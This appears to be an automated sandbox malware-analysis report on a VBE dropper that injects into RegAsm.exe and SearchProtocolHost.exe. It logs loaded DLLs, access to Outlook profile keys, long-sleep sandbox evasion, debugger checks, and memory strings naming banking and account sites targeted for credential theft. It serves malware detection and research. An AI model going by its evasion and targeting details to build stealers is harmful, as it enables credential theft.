                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: tquery.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: DOC_114542366.vbeStatic file information: File size 1712053 > 1048576
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zfEzkYXCOLr.exe, 00000005.00000000.1497037185.0000000000DEE000.00000002.00000001.01000000.00000009.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3775116612.0000000000DEE000.00000002.00000001.01000000.00000009.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3776253990.000000000380E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3776253990.0000000003670000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.1577071302.00000000034C3000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.1575159803.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000006.00000002.3776253990.000000000380E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3776253990.0000000003670000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.1577071302.00000000034C3000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.1575159803.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: zfEzkYXCOLr.exe, 00000005.00000003.1514614257.00000000005BB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: zfEzkYXCOLr.exe, 00000005.00000003.1514614257.00000000005BB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: VXCVY2334.pdb source: temp_u8gpg.exe, 00000002.00000000.1408500684.0000000000D32000.00000002.00000001.01000000.00000006.sdmp, temp_u8gpg.exe.0.dr
                Source: temp_u8gpg.exe.0.drStatic PE information: 0xCB61099E [Tue Feb 15 07:05:02 2078 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040203D push ebp; ret 3_2_0040203E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004129B0 push edi; iretd 3_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004129B3 push edi; iretd 3_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00402205 push edx; iretd 3_2_00402208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00412A0A push edi; iretd 3_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040DB1B pushfd ; ret 3_2_0040DB1C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00419320 push ebx; retf 3_2_0041936D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00403480 push eax; ret 3_2_00403482
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004024B1 push ds; ret 3_2_004024B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404D48 push edx; ret 3_2_00404D4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D757 push ecx; ret 3_2_0040D772
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040870B push dword ptr [edx]; ret 3_2_00408710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00414FE5 push edx; iretd 3_2_00414FFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004017F6 push ds; iretd 3_2_004017FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D78C push ecx; ret 3_2_0040D772
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D791 push ecx; ret 3_2_0040D772
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE09AD push ecx; mov dword ptr [esp], ecx3_2_02EE09B6
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_05798469 push ecx; ret 5_2_05798484
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_0579341D push dword ptr [edx]; ret 5_2_05793422
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_0579FCF7 push edx; iretd 5_2_0579FD0E
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057984A3 push ecx; ret 5_2_05798484
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_0579849E push ecx; ret 5_2_05798484
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_0579D71C push edi; iretd 5_2_0579D6D1
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_0579D6C2 push edi; iretd 5_2_0579D6D1
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057A4074 push ebx; retf 5_2_057A407F
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_0579882D pushfd ; ret 5_2_0579882E
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_0578FA5A push edx; ret 5_2_0578FA5D
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057A5AF2 push edx; iretd 5_2_057A5B07
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036A09AD push ecx; mov dword ptr [esp], ecx6_2_036A09B6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E35288 push dword ptr [edx]; ret 6_2_02E3528D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E4A383 push ds; ret 6_2_02E4A384
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMemory allocated: 3250000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5D1C0 rdtsc 3_2_02F5D1C0
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeWindow / User API: threadDelayed 2128Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeWindow / User API: threadDelayed 7845Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI coverage: 3.1 %
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe TID: 8108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 3444Thread sleep count: 2128 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 3444Thread sleep time: -4256000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 3444Thread sleep count: 7845 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 3444Thread sleep time: -15690000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe TID: 6588Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe TID: 6588Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe TID: 6588Thread sleep time: -52500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe TID: 6588Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe TID: 6588Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E4CB30 FindFirstFileW,FindNextFileW,FindClose,6_2_02E4CB30
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 74w51-39.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: 74w51-39.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: 74w51-39.6.drBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: 74w51-39.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: 74w51-39.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: 74w51-39.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: 74w51-39.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: 74w51-39.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: 74w51-39.6.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: 74w51-39.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: 74w51-39.6.drBinary or memory string: global block list test formVMware20,11696503903
                Source: zfEzkYXCOLr.exe, 00000007.00000002.3771872673.00000000009BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                Source: 74w51-39.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: 74w51-39.6.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: 74w51-39.6.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: 74w51-39.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: 74w51-39.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: 74w51-39.6.drBinary or memory string: AMC password management pageVMware20,11696503903
                Source: 74w51-39.6.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1872901592.000001D99257C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 74w51-39.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: 74w51-39.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: 74w51-39.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: 74w51-39.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: 74w51-39.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: 74w51-39.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: 74w51-39.6.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: 74w51-39.6.drBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: 74w51-39.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: 74w51-39.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: 74w51-39.6.drBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: 74w51-39.6.drBinary or memory string: discord.comVMware20,11696503903f
                Source: 74w51-39.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5D1C0 rdtsc 3_2_02F5D1C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417F53 LdrLoadDll,3_2_00417F53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9F2F8 mov eax, dword ptr fs:[00000030h]3_2_02F9F2F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF02E1 mov eax, dword ptr fs:[00000030h]3_2_02EF02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF02E1 mov eax, dword ptr fs:[00000030h]3_2_02EF02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF02E1 mov eax, dword ptr fs:[00000030h]3_2_02EF02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED92FF mov eax, dword ptr fs:[00000030h]3_2_02ED92FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED mov eax, dword ptr fs:[00000030h]3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB52E2 mov eax, dword ptr fs:[00000030h]3_2_02FB52E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0F2D0 mov eax, dword ptr fs:[00000030h]3_2_02F0F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0F2D0 mov eax, dword ptr fs:[00000030h]3_2_02F0F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE92C5 mov eax, dword ptr fs:[00000030h]3_2_02EE92C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE92C5 mov eax, dword ptr fs:[00000030h]3_2_02EE92C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA2C3 mov eax, dword ptr fs:[00000030h]3_2_02EEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA2C3 mov eax, dword ptr fs:[00000030h]3_2_02EEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA2C3 mov eax, dword ptr fs:[00000030h]3_2_02EEA2C3
